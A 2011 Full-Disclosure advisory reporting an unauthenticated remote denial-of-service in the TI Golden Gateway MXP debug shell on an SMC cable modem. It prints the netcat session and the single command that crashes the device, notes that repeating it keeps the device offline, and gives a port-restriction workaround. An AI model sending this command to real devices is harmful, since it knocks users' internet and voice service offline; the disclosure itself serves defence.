DoS in TI Golden Gateway MXP Debug Application

[will <will () shakingrock com>]

#######################################################################

                             Will Urbanski

Application:    Texas Instruments Golden Gateway MXP Debug Application
                http://www.ti.com

Vuln ID:        SHR20111201
                
Version:        2007

Platforms:      Embedded (tested on SMC D3GNV Cable Modem)

Bug:            input sensitization DoS vuln in `show rtcp_info`

Exploitation:   remote
Date:           01 Dec 2011
Author:         Will Urbanski
                e-mail: will () shakingrock com
                permalink:      http://www.shakingrock.com/vulns/SHR20111201.txt


#######################################################################


1) Introduction
2) `show rctp_info`
3) Impact
4) Workaround


#######################################################################

===============
1) Introduction
===============

> From vendor's homepage:
"Golden Gateway® software is designed to run on Texas Instruments (TI) Digital Signal Processors (DSPs). The software, 
which powers voice, fax and data modem transmission over the Internet, is inside products made by industry leaders such 
as Cisco Systems, 3Com, Nortel Networks and many other leading voice and data communications equipment manufacturers. "

#######################################################################

==========================================
2) `show rctp_info`
==========================================

Executing `show rctp_info 1` results in system failure due to a critical process being terminated. The show command is 
normally used to display system information and should not result in application termination.

$ nc 172.16.1.1 4159
��
��!��
��Texas Instruments Inc. 2007
Golden Gateway Remote Command Processor
MXP>show version
show version
XGCP Version: 2.7.0
CM Version Label: 2.7.0
[...]
MXP>show rtcp_info 1
show rtcp_info 1
MXP>sigterm_prog=0;calling vp880_restart

The DoS can be initiated remotely by simply sending "show rtcp_info 1" to the MXP shell. During some of our tests we 
were unable to regain internet connectivity until the device had been unplugged. In the event that connectivity is 
restored spamming "show rtcp_info 1" to the MXP shell will ensure the device stays offline.


#######################################################################

===========
3) Impact
===========

As mentioned on the vendors site the Golden Gateway Remote Command Processor MXP Debug Application is included in many 
embedded networking devices. "The software, which powers voice, fax and data modem transmission over the Internet, is 
inside products made by industry leaders such as Cisco Systems, 3Com, Nortel Networks and many other leading voice and 
data communications equipment manufacturers." This remote denial of service was discovered in an SMC D3GNV DOCSIS 3.0 
Multimedia Voice Gateway which provides voice, wifi, and cable internet capabilities. This vulnerability _may_ be found 
on any device that allows unauthenticated access to the MXP Debug Application shell.


#######################################################################

==============
4) Workaround
==============

Restrict access to port tcp/4159 on devices that are allowing unauthenticated access to the MXP Debug Application.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/